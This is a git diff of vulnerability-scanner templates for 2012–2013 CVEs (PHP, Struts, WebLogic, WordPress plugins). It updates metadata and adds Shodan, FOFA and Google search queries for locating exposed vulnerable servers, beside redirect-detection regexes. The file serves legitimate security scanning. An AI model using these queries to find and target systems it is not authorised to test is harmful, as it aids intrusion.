-# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df385e30d328b80da4b6c9904af41285b8b741ca53a993dad0e0890bd2a2f15502203fd8dcce02a5490e27f62698143778bf2a7d93367779818b553ffa4a81cc41bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 261a508fa6..dadef786a4 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -21,15 +21,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1823 cwe-id: CWE-20 - epss-score: 0.97491 - epss-percentile: 0.99972 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php product: php + shodan-query: cpe:"cpe:2.3:a:php:php" tags: cve,cve2012,kev,vulhub,rce,php - variables: string: "CVE-2012-1823" @@ -48,4 +48,4 @@ http: part: body words: - '{{md5(string)}}' -# digest: 490a0046304402201ac0c2b72933df8c0fb7ef1c5a6a19a79cd40e76379881895be285e80251e69102203260f22d356f293b8ba1f047f27246d4f8c53067e6d42af2772d64392ea8fa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022ce5c4f17e4d8fc33d21bc60cf909dfcbb5c85217e1c7fa201caac4702e7d140221008912f28136b2b7554af51f8c82f896a076d16087aa6b5bff6027c4075a4937da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 900ec78ab6..a0e5d5ceae 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,16 +18,15 @@ info: cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - epss-score: 0.01124 - epss-percentile: 0.84313 + epss-score: 0.00919 + epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: timely - product: all-in-one_event_calendar - google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" + product: "all-in-one_event_calendar" + google-query: "inurl:\"/wp-content/plugins/all-in-one-event-calendar\"" tags: cve,cve2012,wordpress,xss,wp-plugin,timely - flow: http(1) && http(2) http: @@ -65,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd9c2eba04583bf307715f49c0a9b8dcb35e54b05488eb76bca471449fc8578d02201cbf02452243791fb963618b87705a68b11618dd34035663df56beeae79d4e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index a8e71b45e0..2913acd5e2 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -20,15 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - epss-score: 0.01345 - epss-percentile: 0.85828 + epss-score: 0.01099 + epss-percentile: 0.84417 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mnt-tech - product: wp-facethumb + max-request: 2 + vendor: "mnt-tech" + product: "wp-facethumb" tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech - flow: http(1) && http(2) http: @@ -62,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a68872c0120c49c2ba1aef340825a78fbbe93fa9d3933600679f4ca0b123aa7022100f7bb18b55478b50e8860386f6f160a8bb309aca156ad8d5d33ff53cb31e7e5c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index c3d18b28f9..ee4d59d28b 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -24,12 +24,19 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.95986 - epss-percentile: 0.99354 + epss-percentile: 0.99471 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: fusion_middleware + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" + google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb http: @@ -64,4 +71,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073b059f06469d58c867070e171a4533bb976f5775453e911a3c02a02e0f7648b0220210d93050cb989bbd9f6a41297ef913318659adb3a0fdb23d50c031072dd0ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index b1dc2b670f..04e5dde1b0 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -28,7 +28,11 @@ info: max-request: 1 vendor: websitepanel product: websitepanel - shodan-query: title:"WebsitePanel" html:"login" + shodan-query: + - title:"WebsitePanel" html:"login" + - http.title:"websitepanel" html:"login" + fofa-query: title="websitepanel" html:"login" + google-query: intitle:"websitepanel" html:"login" tags: cve,cve2012,packetstorm,redirect,websitepanel,authenticated http: @@ -47,4 +51,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100ee9d837e70b676d11e501a5486b5c0d956d0fde58e815eee2d49972196ce1a6802207e4e2e3002e677556026c5984d545360653b9b6730f239e6470757314a608880:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a26f4858915a56030092800bf1f71a30d4c6bbb2d65af1b97307df3af2370a202200387753f9b464f8878e789c36df39c2d8df8a8df9e2a86ac5dcf1db35690f7ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 746bfbe330..aea8667020 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -12,20 +12,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59546 + epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: mf_gig_calendar_project - product: mf_gig_calendar + max-request: 2 + vendor: "mf_gig_calendar_project" + product: "mf_gig_calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project - flow: http(1) && http(2) http: @@ -59,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f322610921b216cee6caa7ac536c05dd12be0219e40dc2043b448b65fb87d2ac022100a5d43d8609bdbcb3d8d0a1c76313c928e074f2f05299cb8a52c1d0e6cedd3068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 27efb88ce1..20c8be978a 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss http: - method: GET @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022034f990a5bff340326f593c8b149d2c1411d20ed9cf0844eb64585b1dbdc6f1e202204f319f36ce4f7c1b596ec339117b0cb8b258df92388a6d342faa644f81bc658f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf2959f6c0a7bd68f61e6edc7c0de5abc7e587704c1d8914f46c881f3ca118e402203faa0292a5e4bd71f7706588f37e2c754db8827daf38264dc97f26d3d473a380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 3036b6aa54..b8448f8ab6 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -21,15 +21,14 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.64486 + epss-percentile: 0.65097 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: ppfeufer - product: 2-click-social-media-buttons - google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" + product: "2-click-social-media-buttons" + google-query: "inurl:\"/wp-content/plugins/2-click-socialmedia-buttons\"" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer - flow: http(1) && http(2) http: @@ -65,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009495c090f698113d0e1574cb3dcbc0b559ad192f6a04012c7dfdd06de3faf3bf02206ac6fe436c81ac4a8f630ef89c1293168cc6e9c8e15a8736c309a8b827967131:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 978a44a399..15b4b7efcd 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -25,6 +25,7 @@ info: max-request: 2 vendor: laurent_destailleur product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2012,cve,xss,awstats,edb,laurent_destailleur http: @@ -50,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f8f92c2922899207b46b0a7414d8ae6906729368cc5236e2709a80e69c61fa302201b58818ce7172c2d55376f5399cc320d825a21d5e47e73801a0e651c60b21217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 69ab252b50..54c7378680 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -24,12 +24,13 @@ info: epss-percentile: 0.82559 cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: mikejolley - product: download_monitor + product: "download_monitor" framework: wordpress + shodan-query: "http.html:\"/wp-content/plugins/download-monitor/\"" + fofa-query: "body=\"/wp-content/plugins/download-monitor/\"" tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley - flow: http(1) && http(2) http: @@ -63,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daff72673225c1d5295cf598ad635b40a32ac87c4997268008e72526606b0dd602202b6a0b28d688f686fa7cc48e1362b713eb04eea95e138a13e9acd1ba27d2f2f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 8182a35a3e..accdf40bdd 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - epss-score: 0.00608 - epss-percentile: 0.7813 + epss-score: 0.00537 + epss-percentile: 0.7717 cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea7b17222b76afe635b0afb07df36cbbd4a0ddc64064490c057e48d693516932022025d9e8f9fd8c306ad62e0aab881c916004e64d1fffb0880f9348ad1246c89af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index be960aed11..21229c39db 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 - epss-percentile: 0.91352 + epss-percentile: 0.91568 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206053a67e4c75600835c22ae91ef4fd397c90fa9b2694c0503f97ba099eb9a0d5022100a8640797cc7a3ee57fe391de4fdb176fcc3441b0d320382db505ade82f522a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 5d5c070da4..4ff4b2bd84 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2012-4940 cwe-id: CWE-22 epss-score: 0.16414 - epss-percentile: 0.95527 + epss-percentile: 0.95998 cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 @@ -43,4 +43,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a004630440220135dfc4a7ae9664bb15c696ab57100ebe3aac536a3149a7c2e85379d9c2385b802202532abf6841721c06135ae12e7fa664254438c6abe917cf0d2b6d7bec3372034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205123649a5c5a0cf48e5504f37641df07c39118a5bf9d04602c312ddaf1829f4a02200d0a386529b388651d5e905d36a1424e739186e1aad43157264eefa4369d25dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index f427fcec55..2b1431c800 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2012-4982 cwe-id: CWE-20 epss-score: 0.00357 - epss-percentile: 0.71561 + epss-percentile: 0.72078 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ec2fe2c080364c2725038246ec86b302494760c76487831383fe67a5752edbe0220430c9fbcc6a09954031a1058ff6bfc3e4ec9108aff02ebc4a0ab7af0f744647e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index c9a6ae8f37..62f047c214 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.8 cve-id: CVE-2012-5321 cwe-id: CWE-20 - epss-score: 0.01926 - epss-percentile: 0.87386 + epss-score: 0.01708 + epss-percentile: 0.87767 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2012,redirect,tikiwiki,groupware,tiki http: @@ -40,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c29af02d64c2d710b335c5a8a86f05e6a9ddc754b21dc4a9f83dedce88c9984f0220277108a1e059287ea4decddab0aac3bcb4a99dd35876e104b2919c01eab48837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index ba0b6775f3..89721b98d3 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -21,14 +21,13 @@ info: cve-id: CVE-2012-5913 cwe-id: CWE-79 epss-score: 0.01863 - epss-percentile: 0.88104 + epss-percentile: 0.8837 cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: wordpress_integrator_project - product: wordpress_integrator + max-request: 2 + vendor: "wordpress_integrator_project" + product: "wordpress_integrator" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project - flow: http(1) && http(2) http: @@ -62,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fe33a98fffb2f7bd719f8835979dce71ac15ffda6a390c507485268dba885130220611cdd56362890cd14694b9b8b068971580e88a58747d31ad37b7af05c7b070b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 7eade9c1f7..10b2cf7c8c 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 - epss-score: 0.01204 - epss-percentile: 0.83755 + epss-score: 0.03575 + epss-percentile: 0.91621 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd2aa86d10e6be5f1738aa796ffd9c92e8353df18f5d595923b6318568db4058022069941042036744dbd5b17fd869b34cab85848f1db8fa9df127a07d51dcd9765a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 792c18b646..3c027dfa1b 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -26,6 +26,15 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,rce,struts,ognl http: @@ -48,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220168f2ceafa9398f1fc6df358204734263379eb8fe96271e8fc739cebecf201d702210082d01b4e4bb988273ae94292d6e113c8ae25ac0b8364cbdd2ad53c5b51b4fa37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index b377638929..62890aabb0 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -19,13 +19,22 @@ info: cvss-score: 5.8 cve-id: CVE-2013-2248 cwe-id: CWE-20 - epss-score: 0.97268 - epss-percentile: 0.99838 + epss-score: 0.97189 + epss-percentile: 0.99819 cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,apache,redirect,struts,edb http: @@ -38,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f654b7a881c93c5b0fd6ba6f0ab4afd3e589a70ebb01f72b93608c15dc283920022100939385f30db5129f2b3d3a76aa8eca8b29c1522186d11e10a97b5805ab8fb7cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 33f46ae811..e02def3150 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -26,6 +26,15 @@ info: max-request: 9 vendor: apache product: struts + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" + google-query: intitle:"struts2 showcase" tags: cve2013,cve,rce,struts,apache,ognl,kev http: @@ -61,4 +70,4 @@ http: - 200 - 400 condition: or -# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b1c8d92dec0571023b7888f874ed36cee640fde6f0530d37512f77d921700b50220357fa02c4e643f3e3dfb577a873454e767ee8c023840bac3fe72af9f626e3271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 462bf63912..4db1803823 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -20,15 +20,14 @@ info: cve-id: CVE-2013-2287 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59251 + epss-percentile: 0.59874 cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: roberta_bramski + max-request: 2 + vendor: "roberta_bramski" product: uploader - google-query: inurl:"/wp-content/plugins/uploader" - tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski - + google-query: "inurl:\"/wp-content/plugins/uploader\"" + tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski,intrusive flow: http(1) && http(2) http: @@ -64,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f5a88bdea6734d0ab391b6fd5fd8bb17242dabdbf218f078c26dbbf2c20174b022100d2610dcc53a2bbfefe240bb8964c81be7f35628b5cc37995ab62ac5be77bed16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 47c48e1895..032544c7d5 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -14,21 +14,21 @@ info: - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 epss-score: 0.00519 - epss-percentile: 0.74326 + epss-percentile: 0.76703 cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: - max-request: 1 + max-request: 2 vendor: wptrafficanalyzer product: trafficanalyzer - google-query: inurl:"/wp-content/plugins/trafficanalyzer" + google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\"" tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer - flow: http(1) && http(2) http: @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ee2266839819c8d988e3fa222e2c471bcd72d268986a3b55ef7cd5254078659022040278011c08a10348e0f4b2c391a9cd541c03006764111a8bf756d82c5e581c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 1e74819b55..e9e7a09ba8 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -25,6 +25,13 @@ info: max-request: 10 vendor: oracle product: fusion_middleware + shodan-query: + - http.title:"weblogic" + - http.html:"weblogic application server" + fofa-query: + - title="weblogic" + - body="weblogic application server" + google-query: intitle:"weblogic" tags: 